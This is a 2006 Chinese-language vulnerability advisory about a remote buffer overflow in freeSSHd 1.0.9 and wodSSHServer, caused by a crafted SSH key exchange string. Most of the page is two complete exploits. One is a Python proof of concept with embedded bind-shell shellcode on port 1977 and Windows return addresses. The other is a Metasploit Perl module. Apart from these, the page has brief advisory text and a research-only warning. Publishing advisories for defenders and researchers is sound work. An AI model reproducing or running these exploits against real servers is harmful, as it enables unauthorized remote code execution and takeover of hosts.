首页 -> 安全研究
安全研究
安全漏洞
多家厂商SSH Server远程缓冲区溢出漏洞
发布日期:2006-05-12
更新日期:2006-05-16
受影响系统:
freeSSHd freeSSHd 1.0.9描述:
WeOnlyDo! wodSSHServer 1.3.3 DEMO
WeOnlyDo! wodSSHServer 1.2.7
BUGTRAQ ID: 17958
wodSSHServer和freeSSHd都是用于实现和支持SSH的产品。
wodSSHServer和freeSSHd在处理从SSH客户端发送的特制密钥交换算法字符串时存在溢出漏洞,攻击者可以通过向服务器发送特制的请求导致执行任意指令。
<*来源:Gerry Eisenhaur
Tauqeer Ahmad (ahmadtauqeer@yahoo.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114771241008126&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
"""
Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
ahmadtauqeer[at]yahoo.com
Disclaimer: This Proof of concept exploit is for educational purpose only.
Please do not use it against any system without prior permission.
You are responsible for yourself for what you do with this code.
Greetings: All the Pakistani White Hats including me ;)
Flames: To all the skript kiddies out there. Man grow up!.
Code tasted against freeSSHd version 1.0.9
If you didn't get shell at first try, try few times and you will get lucky
Advisories:
http://www.securityfocus.com/bid/17958
http://www.frsirt.com/english/advisories/2006/1786
"""
import socket
import getopt
import sys
host = "192.168.0.2"
port = 0
eip =""
#/* win32_bind - EXITFUNC=thread LPORT=1977 Size=317 Encoder=None http://metasploit.com */
shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" \
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" \
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" \
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" \
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" \
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" \
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" \
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" \
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" \
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" \
"\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff" \
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" \
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff" \
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64" \
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" \
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" \
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" \
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" \
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6" \
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0"
def exploit():
buff = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" \
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
buff = buff + "A" * 1055
buff = buff + eip
buff = buff + "yyyy"
buff = buff + "\x90" * 4
buff = buff + shellcode
buff = buff + "B" * 19021 + "\r\n"
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((host, port))
print "+ Recive reply from server: " + sock.recv(1000)
sock.send(buff)
print "+ SSHD exploited. Now telnet to port 1977 to get shell "
print "+ if you didnt get shell in first try.Try again until you success"
sock.close()
sock = None
def usage():
print "#############################################"
print "# CODED BY TAUQEER AHMAD #"
print "# Scientist #"
print "#############################################"
print "\n"
print "Usage: %s -h <hostip> -p <port> -o <OS>" % sys.argv[0]
print "Following OS supported\n"
print "1 Window XP SP1"
print "2 Window XP SP2"
print "3 Windows 2000 Advanced Server"
if __name__ == '__main__':
if len(sys.argv) < 7:
usage()
sys.exit()
try:
options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0]
except getopt.GetoptError, err:
print err
usage()
sys.exit()
for option, value in options:
if option == '-h':
host = value
if option == '-p':
port = int(value)
if option == '-o':
if value == '1':
eip = "\xFC\x18\xD7\x77" # 77D718FC JMP ESP IN USER32.dll (Windows Xp professional SP1)
elif value == '2':
eip = "\x0A\xAF\xD8\x77" # 77D8AF0A JMP ESP IN USER32.DLL (Windows Xp professional SP2)
elif value == '3':
eip = "\x4D\x3F\xE3\x77" # 77E33F4D JMP ESP IN USER32.DLL (windows 2000 advanced server)
else:
usage()
sys.exit()
exploit()
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::freesshd_key_exchange;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 22],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'AutoOpts' => { 'EXITFUNC' => 'process' },
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a simple stack overflow in FreeSSHd 1.0.9.
This flaw is due to a buffer overflow error when handling a specially
crafted key exchange algorithm string received from an SSH client,
}),
'Refs' =>
[
['BID', '17958'],
],
'Targets' =>
[
['Windows 2000 SP4 English', 0x77e56f43],
['Windows XP Pro SP0 English', 0x77e51877],
['Windows XP Pro SP1 English', 0x77e53877],
],
'Keys' => ['ssh'],
'DisclosureDate' => 'May 12 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $sploit =
"SSH-2.0-OpenSSH_3.9p1".
"\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde".
Pex::Text::AlphaNumText(1055). pack('V', $target->[1]).
$shellcode. Pex::Text::AlphaNumText(19000). "\r\n";
$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $resp = $s->Recv(-1);
chomp($resp);
$self->PrintLine('[*] FreeSSHD: ' . $resp);
if($resp !~ /SSH-2\.0-WeOnlyDo 1\.2\.7/) {
$self->PrintLine('[*] Not a FreeSSHD service... ');
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}
1;
建议:
厂商补丁:
freeSSHd
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://freesshd.com/
WeOnlyDo!
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.weonlydo.com/index.asp?showform=SSHServer
浏览次数:3978
严重程度:0(网友投票)
绿盟科技给您安全的保障